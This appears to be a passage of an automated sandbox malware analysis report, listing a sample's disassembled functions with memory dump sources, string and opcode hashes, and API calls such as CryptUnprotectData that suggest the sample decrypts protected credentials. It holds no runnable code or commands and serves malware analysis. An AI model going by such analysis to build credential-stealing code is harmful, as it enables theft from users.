                  Function 00FC9054 Relevance: 5.3, Strings: 3, Instructions: 1587COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G?c$pkk$||_
                  • API String ID: 0-1975962775
                  • Opcode ID: f98047a55da8120b510b2255aa96262ec891e6749b8da4496ad656567bcce468
                  • Instruction ID: 448872c1f66f90a006419182471e9254d3856c86c3e3c794ddab412a92577d15
                  • Opcode Fuzzy Hash: f98047a55da8120b510b2255aa96262ec891e6749b8da4496ad656567bcce468
                  • Instruction Fuzzy Hash: D3B219F3A0C2049FD3046E2DEC8567AFBE9EF94720F1A493DEAC487744EA3558058697
                  Function 00FD339D Relevance: 5.3, Strings: 3, Instructions: 1507COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: BU7k$5o$j
                  • API String ID: 0-1684384253
                  • Opcode ID: 93c9c9c16c874f71f7cf47c6829123484fbabdca728abf732dec77e62b68144d
                  • Instruction ID: 3fa7c914ea66d7836e471005f8c5b2852498469ad1a9c51feab0165c5dbccb76
                  • Opcode Fuzzy Hash: 93c9c9c16c874f71f7cf47c6829123484fbabdca728abf732dec77e62b68144d
                  • Instruction Fuzzy Hash: CBA2C2F3A0C200AFE7046E29EC8567AFBE5EF94720F1A493DEAC487744E63558448797
                  Function 00C13720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(00C1E118,00000000,00000001,00C1E108,00000000), ref: 00C13758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C137B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 3855d6708debce910db32e151b32bab3a3251dd3835c0396269d76c686404a6a
                  • Instruction ID: be2ff06315c9e7bfa68a5e1ee6dfa7fd18b96d0264d56c6955574458cfbcb7fb
                  • Opcode Fuzzy Hash: 3855d6708debce910db32e151b32bab3a3251dd3835c0396269d76c686404a6a
                  • Instruction Fuzzy Hash: 2341F670A40A28AFEB24DB58CC84BDAB7B4BB49306F4041D9A608E72D0D771AEC5CF50
                  Function 00C09B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C09B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C09BA3
                  • LocalFree.KERNEL32(?), ref: 00C09BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 069ff1d44656bf0fec4410c85a3a17e782a77c2897b1012886a7482c0c6912fe
                  • Instruction ID: c69c3f7f2792fef098d808fd6308a6a0c00c4a2d405c47d4cc1b64da6c3b3905
                  • Opcode Fuzzy Hash: 069ff1d44656bf0fec4410c85a3a17e782a77c2897b1012886a7482c0c6912fe
                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D989AAE77B5FF89300F104568E915A7390D770AE15CFA1
                  Function 00EF9E8F Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ooU
                  • API String ID: 0-1500930429
                  • Opcode ID: e6625c2f48ba7e3dd3b27db319949d094cda9e9abc446ad30abd4955f53e830f
                  • Instruction ID: 41c26a6d2b21b64a1b4dd61499c1c3add279ab339929d78ab8248e330f71f118
                  • Opcode Fuzzy Hash: e6625c2f48ba7e3dd3b27db319949d094cda9e9abc446ad30abd4955f53e830f
                  • Instruction Fuzzy Hash: 2C5126F360C2005FE308AA2DDC5577ABBD9EFD4720F2A883DE6C5C3780E93598058656
                  Function 00EC9C37 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: J#8]
                  • API String ID: 0-3986886222
                  • Opcode ID: 373921d350dbbeb635000cbe5395428fab81c30f2e2b5dd03da77dd433ec01de
                  • Instruction ID: 9fd78c6e0f0c97c8533ca3d2de0a55bc5e7cbbf307c850ceee6364c189608c0a
                  • Opcode Fuzzy Hash: 373921d350dbbeb635000cbe5395428fab81c30f2e2b5dd03da77dd433ec01de
                  • Instruction Fuzzy Hash: 26416EF7E0551007E74C692CEC6577B7686DB90360F2F823DE98A97B84E83A1C0542C6
                  Function 00F86119 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: E/}
                  • API String ID: 0-2449979294
                  • Opcode ID: cb0d4200fe1e1baf4188ad7f040cc55f8554b3c4ff741c1144de469a76b6e41b
                  • Instruction ID: 4e445193e0838b9eaec20f8143fff912809b05bd676ef4a4def427403b8d2724
                  • Opcode Fuzzy Hash: cb0d4200fe1e1baf4188ad7f040cc55f8554b3c4ff741c1144de469a76b6e41b
                  • Instruction Fuzzy Hash: 61415BB3A142148BE3147E7DEC5537AB7D8EB91720F1A063DDA84D3780E979490A8386
                  Function 00FD2153 Relevance: .9, Instructions: 903COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 006388077f904e72344580a9639c1c3914e7743be5641352a59ee478a9f34908
                  • Instruction ID: dd78bedef777718d518f16f743c48c7bbd57343ae2713bd409a66cb2f4578dc1
                  • Opcode Fuzzy Hash: 006388077f904e72344580a9639c1c3914e7743be5641352a59ee478a9f34908
                  • Instruction Fuzzy Hash: 8152F6F3A0C2009FE714AE29DC8577ABBE5EF94720F1A893DEAC4C3744E63558058697
                  Function 00E7BF49 Relevance: .2, Instructions: 183COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8321d4e941bd7b0aec5f780958c613ff81fe18bc752ccf4e934a03451b9b6a99
                  • Instruction ID: 29f2115bb327274eea47b6487f1c3d3d23a08fb824ec1b094cdee3a25353e2da
                  • Opcode Fuzzy Hash: 8321d4e941bd7b0aec5f780958c613ff81fe18bc752ccf4e934a03451b9b6a99
                  • Instruction Fuzzy Hash: F05126B3A082149FF314AE28DC547BAB7D5EB98320F1A453DDAC9C7380EA3959418786
                  Function 00F79A74 Relevance: .2, Instructions: 165COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdc71bcd207b8d99b5b7d6e9b1262b4924a72bc0caae68c7399967379ee6fa6e
                  • Instruction ID: 858ee9cea0cb804f9f6213d71602179f20fd58e7b9bf22cfbbfbc63a94f8e63e
                  • Opcode Fuzzy Hash: bdc71bcd207b8d99b5b7d6e9b1262b4924a72bc0caae68c7399967379ee6fa6e
                  • Instruction Fuzzy Hash: 98418AF3F192144BF3045A3EDC84767B6879BE4720F3B863DCA8857788EC39580A4296
                  Function 00F4916E Relevance: .1, Instructions: 148COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aa43ab1c5a1046c35910f6eb28ddf742e73f0a5859461489a4db5cb8767e08f0
                  • Instruction ID: a2886a4dab9a6292d5d233dbb98dc45e81e18e2dfcecb37a6abf5d59346c40a2
                  • Opcode Fuzzy Hash: aa43ab1c5a1046c35910f6eb28ddf742e73f0a5859461489a4db5cb8767e08f0
                  • Instruction Fuzzy Hash: AA416AF3D1811457F3086A28DC5577AB69ADBA4320F1B463CEF8A973C4E87A5C1582C6
                  Function 00FC4F6C Relevance: .1, Instructions: 127COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 28ec6dca26a2e9f6b6ed26faf0de258eed0dd81f811d444878b793477dab5f9b
                  • Instruction ID: 492ec6b87d79e39dbfa19cdd7681671d331786affa536c984ae5e8077d571d64
                  • Opcode Fuzzy Hash: 28ec6dca26a2e9f6b6ed26faf0de258eed0dd81f811d444878b793477dab5f9b
                  • Instruction Fuzzy Hash: EA41B2B254C3089FE344BE69EC8667AF7E5EBA4310F56493DCAC583700EA756844C647
                  Function 00C19750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
